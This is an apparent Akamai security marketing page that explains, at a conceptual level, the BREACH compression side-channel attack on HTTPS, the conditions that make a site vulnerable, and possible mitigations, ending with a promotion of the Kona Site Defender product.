The BREACH attack was discovered in 2013. This type of data breach exploits the combination of data compression and encryption used by websites to accelerate page load times, conserve bandwidth and secure data during transmission. Although the BREACH attack does not directly target SSL security, it compromises the privacy goal of SSL by reducing HTTPS to encrypting page headers, leaving other content susceptible to discovery. Using a combination of brute force attacks and divide-and-conquer techniques, BREACH attacks can be employed by hackers to extract login credentials, email addresses, and other sensitive, personally identifiable information from SSL-enabled websites.
BREACH Attack: Conditions for Vulnerability and Possible Mitigation Techniques
The BREACH attack is agnostic to the version of SSL/TLS protocol in use, and effective against any type of cipher suite as long as the following conditions are met:
- The web application is served using HTTP-level compression and reflects user-supplied data and a static secret in HTTP response bodies.
- The attacker knows what to search for and is able to monitor traffic between the user and the web application in order to recover the length of HTTP replies.
- The attacker is able to persuade the user to visit a website containing malicious script and inject a man-in-the-browser capable of sending requests to the target website.
In effect, by injecting plaintext into an HTTPS request and observing the length of compressed HTTPS responses, an attacker is able to iteratively guess and derive plaintext secrets from an SSL stream.
Requiring only a few thousand requests, the BREACH attack is executable in less than 60 seconds; and no clean, practical way to eliminate the exploit exists. Possible mitigations include disabling HTTP compression, which would result in reduced performance and increased bandwidth usage; separating secrets from user input; or rate-limiting requests to the server. Most BREACH attack mitigations are application-specific or require improved info security best practices concerning the handling of sensitive data. Other preventative measures include implementing vulnerability management on web applications and using a Web Application Firewall to detect and block malicious clients.
A Simple, Powerful Way to Protect Your Web Sites and Applications
Akamai is ready and available to help our customers implement appropriate defenses and discuss the performance implications of possible defensive strategies against the BREACH attack. For users of our platform, we recommend using our Kona Site Defender Web Security Solution offering:
- Powerful, built-in DDoS mitigation that leverages the scalability of the Akamai Intelligent Platform to thwart DDoS attacks at both the application and network layers
- A Web Application Firewall enabling deep packet inspection of HTTP/S traffic in order to identify and protect against a SQL injection attack, cross-site scripting, and other common cyber attacks
- Rate controls that may help prevent application layer attacks by monitoring and controlling the rate of requests against our servers and the customer origin
Learn more about Kona Site Defender and other Cloud Security Solutions built on the Akamai Intelligent Platform.